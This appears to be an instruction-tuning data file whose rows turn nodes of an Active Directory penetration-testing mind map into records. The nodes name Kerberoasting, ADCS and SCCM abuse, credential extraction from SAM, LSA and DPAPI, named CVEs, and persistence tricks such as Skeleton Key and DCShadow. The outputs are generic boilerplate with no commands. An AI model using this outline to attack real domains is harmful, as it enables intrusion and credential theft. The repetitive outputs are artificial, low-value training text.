| {"instruction": "Mind map reference", "input": "pxe hash ($sccm$aes128$...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Valid Credentials (Cleartext creds, nt hash, kerberos ticket)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Classic Enumeration (users, shares, ACL, delegation, ...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Enumerate ADCS", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Enumerate SCCM", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Scan Auto", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Kerberoasting", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Coerce", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Intra ID Connect", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Can Connect to a computer", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Exploit", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Low access (Privilege escalation)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Bypass Applocker", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "UAC bypass", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Auto Enum", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Search files", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Exploit", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Kerberos Relay", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "From Service account (SEImpersonate)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Know vulnerabilities authenticated", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "MS14-068", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "GPP MS14-025", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "PrivExchange (CVE-2019-0724, CVE-2019-0686)", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "noPac (CVE-2021-42287, CVE-2021-42278)", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "PrintNightmare (CVE-2021-1675, CVE-2021-34527)", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "Certifried (CVE-2022-26923)", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "ProxyNotShell (CVE-2022-41040, CVE-2022-41082)", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "Dcsync", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Can change msDS-KeyCredentialLInk (Generic Write) + ADCS", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "On Group", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "On Computer", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "On User", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "On OU", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "ReadGMSAPassword", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Get LAPS passwords", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "GPO", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "DNS Admin", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Kerberos Delegation", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Find delegation", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Constrained delegation", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Resource-Based Constrained Delegation", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "S4U2self abuse", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "ADCS", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Enumeration", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Web Enrollment Is Up", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Misconfigured Certificate Template", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Misconfigured ACL", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Vulnerable PKI Object access control", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Misconfigured Certificate Authority", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Abuse Certificate Mapping", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "SCCM", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "recon", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Creds-1 No credentials", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "PXE", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Elevate-1:Relay on site systems Simple user", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Elevate-2:Force client push Simple user", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Elevate-3:Automatic client push Simple user", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "CRED-6 Loot creds", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Takeover-1:relay to mssql db Simple user", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Takeover-2:relay to mssql server Simple user", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Creds-2:Policy Request Credentials Simple user", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Creds-3Creds-4 Computer Admin user", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Creds-5 SCCM admin", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Cleanup", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Post exploit", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Admin access", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Extract credentials from SAM", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Extract credentials from LSA", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Extract credentials from DPAPI", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Misc", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Lateral Move", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Clear text Password", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "NT Hash", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Kerberos", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Socks (relay)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Certificate (pfx)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Domain Admin", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Grab backup Keys", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Trusts", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Enumeration", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Child->Parent", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Parent->Child", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "External Trust", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Mssql links", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Persistence", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "ADD DA", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Silver Ticket", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Skeleton Key", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Custom SSP", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Diamond ticket", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Saphire Ticket", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "DC shadow", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "ACL manipulation", "output": "Reference or note from the mind map without a specific command."} |
| |